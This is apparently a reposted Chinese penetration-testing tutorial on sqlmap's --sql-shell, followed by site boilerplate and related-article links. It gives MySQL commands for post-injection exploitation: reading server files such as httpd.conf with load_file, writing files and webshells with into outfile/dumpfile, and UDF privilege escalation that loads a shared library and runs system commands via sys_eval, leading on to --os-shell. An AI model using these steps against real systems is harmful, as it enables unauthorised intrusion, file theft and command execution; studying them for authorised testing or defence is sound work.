sqlmap中的--sql-shell

这篇具有很好参考价值的文章主要介绍了sqlmap中的--sql-shell。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

命令

sqlmap -u --sql-shell

之后就和sql中的命令一样

文件路径

select @@datadir;

查看版本

select @@version;

读写文件

常见的找绝对路径方法:

网页报错信息
phpinfo、探针
数据库查询、暴力破解
参看:常用的绝对路径收集

查看php是否开启魔术引导

测试方法:
特殊字符测试是否转义成反斜杠
探针、phpinfo等

mysql写shell的条件
1、网站可访问路径的绝对路径
2、secure_file_priv 的值非NULL或包含了导出的绝对路径
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL,即默认禁止导入导出
Mysql<5.5.53 默认为空,即默认无限制
3、mysql服务有对网站可访问路径的写权限
4、mysql连接用户有FILE权限/ROOT用户或ROOT权限
5、GPC关闭//未对闭合用的引号转义
outfile 和 dumpfile的路径不支持hex,必须有引号包裹

# 高版本只允许操作secure_file_priv变量指定目录下的文件
select @@secure_file_priv;

# 写文件  
# into dumpfile用于二进制文件,
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so'; 
# into outfile 主要的目的是导出 文本文件
select '123' into outfile  /var/www/1.html;

#读文件
select load_file('/etc/httpd/conf/httpd.conf');

# 有的时候读取很慢 ,可以不读整个文件 下面先以DocumentRoot分割,获取查找第3个左边的部分
substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20);

udf

#找到现有的自定义函数
select * from mysql.func;

#  MySQL 5.0.67 开始udf需要在指定路径下
select @@plugin_dir;

#导入udf库文件
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';

#创建自定义函数
create function sys_eval returns string soname 'mysqludf.so';

# 执行自定义函数
select sys_eval('whoami');

下一步使用sqlmap --os-shell

可以执行命令
下图是网站的绝对路径
sqlmap中的--sql-shell

参考

安全渗透测试–sql注入之sql-shell文章来源地址https://www.toymoban.com/news/detail-404573.html

到了这里,关于sqlmap中的--sql-shell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  •  sql注入之sqlmap使用

    (1)get注入 python sqlmap.py -u \\\" 指定注入点的URL \\\" #其中“ -u ”参数用于 指定注入点的URL 。 python sqlmap.py -u \\\" 指定注入点的URL \\\" --dbs #,其中参数“ --dbs ”用于列举数据库。 python sqlmap.py -u \\\" 指定注入点的URL \\\" -D iwebsec --tables #其中参数“ -D ”用于指定数据库名称,“ --tables ”参数

    2024年02月15日
    浏览(46)
  • SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)

    1、客户端向服务端请求的流程 2、SQL注入常见分类  3、SQL注入常见过程  4、SQL注入的作用  5、常用SQL测试语句  注释字符: 一、下载DVWA 下载地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub 这里我是从GitHub上下载的,小伙伴们自行选择 二、安装DVWA 在安装前,需要做一个

    2024年01月23日
    浏览(46)
  • 【Shell 命令集合 网络通讯 】Linux 追踪数据包在网络中的路径 traceroute命令 使用指南

    Shell 命令专栏:Linux Shell 命令全解析 traceroute命令用于追踪数据包在网络中的路径。它通过发送一系列的ICMP(Internet Control Message Protocol)回显请求数据包(ping包),并记录每个数据包的传输时间,从而确定数据包从源主机到目标主机经过的所有中间路由器。 当我们使用trac

    2024年02月04日
    浏览(61)
  • SQL注入 - sqlmap联动burpsuite之burp4sqlmap++插件

    目录 sqlmap和burpsuite介绍 sqlmap4burp++介绍 sqlmap4burp++的使用 小插曲:sqlmap报错文件不存在怎么办? SqlMap sqlmap 是一款自动化检测与利用SQL注入漏洞的免费开源工具。 可用于检测利用五种不同类型的SQL注入: 布尔型盲注(Boolean-based blind)即可以根据返回页面判断条件真假的注入

    2024年03月12日
    浏览(59)
  • SQL注入工具之SQLmap入门操作

    了解SQLmap 基础操作 SQLmap 是一款自动化的 SQL 注入工具,可以用于检测和利用SQL注入漏洞。 以下是 SQLmap 的入门操作步骤: 1.下载 SQLmap :可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap。 2.打开终端 :在终端中进入 SQLmap 所在的目录。 3.输入命令 :使用以下命令运行

    2024年02月21日
    浏览(43)
  • sqlmap的一些简单使用命令

    post型注入 *每次使用都要重新抓包,不可以使用旧的数据包   1.使用burpsuite对目标站进行抓包   2.打开sqlmap输入指令 sqlmap -r post.txt路径 *直接把post.txt拖进去即可 回车(~ ̄▽ ̄)~ 得到数据库名和版本   使用 sqlmap.py -r 目标文件 --current-db 爆当前数据库 *使用 sqlmap.py -r 目标文

    2024年02月05日
    浏览(25)
  • 【SQL注入】SQLMAP v1.7.11.1 汉化版

    【SQL注入】SQLMAP v1.7.11.1 汉化版 SQLMAP是一款开源的自动化SQL注入工具,用于扫描和利用Web应用程序中的SQL注入漏洞。它在安全测试领域被广泛应用,可用于检测和利用SQL注入漏洞,以验证应用程序的安全性。 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在用户输入的

    2024年01月19日
    浏览(41)
  • 在kali linux里利用SQLmap实现SQL注入

    SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不

    2024年02月04日
    浏览(47)
  • sqlmap 是一个自动化的 sql 注入渗透工具

    一.介绍 sqlmap 是一个自动化的 sql 注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap 还提供了很多脚本.但在实践测试的时候基本用不上.用于检测和利用 Web 应用程序中的 SQL 注入漏洞。它自动化了识别和利用 SQL 注入漏洞的过程,并可用于执

    2024年01月23日
    浏览(49)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包